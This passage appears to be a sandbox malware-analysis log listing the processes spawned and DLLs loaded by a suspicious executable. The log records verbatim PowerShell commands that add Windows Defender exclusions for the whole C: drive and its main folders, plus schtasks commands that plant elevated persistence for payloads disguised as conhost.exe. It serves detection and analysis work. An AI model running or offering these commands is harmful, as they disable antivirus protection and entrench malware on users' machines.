                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                          Source: unknownProcess created: C:\Recovery\conhost.exe C:\Recovery\conhost.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f
                          Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe "C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\conhost.exe "C:\Program Files\Google\Chrome\Application\conhost.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
